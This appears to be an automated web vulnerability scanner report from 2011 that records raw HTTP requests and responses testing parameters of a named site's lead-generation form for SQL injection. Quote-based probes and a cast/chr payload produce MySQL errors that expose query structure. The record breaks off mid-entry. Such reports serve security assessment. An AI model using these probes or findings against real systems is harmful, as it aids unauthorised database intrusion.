HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:23:02 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=fd9q8eu9d6u00fv29quokam8j0; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:23:43 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=g8lhjrtjncgcv9imisjtqiol27; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip cod' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:23:43 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=cmoegg119jvpmjflvfjkrfrd76; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:24:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=els198drmo79d5sg8t7492e5p2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code' OR prj.project_p' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:24:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=53skvpanfj64amtd83778qm5s7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc'&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ba3q0u8o53f5234u5ma0338of7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... t committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'numeric)&attributeId_342_g=2017__Accounting/Finance&attributeId_343_g=2009__1-9&' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc''&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=lvvcb7cian8gc14e8mdno522i3; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50914
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:24:59 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=lqi4nkg18udbrls60nnel9cr34; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/incn00/project.php?catId=110006&iusrc=' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:25:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=v3bia36783fmg6m5haedumir86; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
1.416. http://www.insideup.com/ppc/leadflow/incn00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/incn00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code&1'=1 HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:31:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1kben36ltraq8oi73qivmr76b2; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8350
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... mitted or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/incn00/project.php?catId=110006&iusrc=iups' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code&1''=1 HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:31:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=9a7eggp3la75rfqdp88mlmckm0; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:26:53 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=chdkg6hit6adkb5r6p416n18j7; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8318
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=110006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/incn00/project.php?catId=110006&iusrc=' at line 5
Request 2
GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=110006&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:26:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8kadvsrf6h1c1qa4cbpfrolhc0; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 50912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
